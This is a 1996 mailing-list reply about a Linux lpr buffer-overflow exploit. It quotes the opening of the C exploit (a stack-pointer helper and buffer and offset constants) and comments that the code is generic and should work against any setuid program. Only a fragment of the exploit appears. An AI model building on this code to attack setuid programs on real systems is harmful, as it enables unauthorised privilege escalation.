Re: Linux's lpr exploit (fwd)
On Sun, 27 Oct 1996, Meir Litmanovich wrote:
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> #define DEFAULT_OFFSET 50
> #define BUFFER_SIZE 1023
>
> long get_esp(void)
> {
>     __asm__("movl %esp,%eax\n");
> }
>
This is more or less the generic Linux buffer overflow code.... I had
this exact same code (using mount instead of lpr) long ago. It seems that
some warez-kiddie took someone's code (I think the original coder is
nicknamed halflife on IRC) and spread it around, taking all the credits
etc. Since this is generic, it should work on all setuid programs.
I'd like to get the patch, though. (Informational, I don't let anybody
run anything on this machine without me ttysnooping him.)
Dudu
------------------------------------------------------------------------------
crisk@netvision.net.il HAIFA, ISRAEL
crisk@kgb.has.stolen.my.cox.org "I code for cash"
------------------------------------------------------------------------------
Cheap quote from SPACEBALLS:
Liquid Schwartz!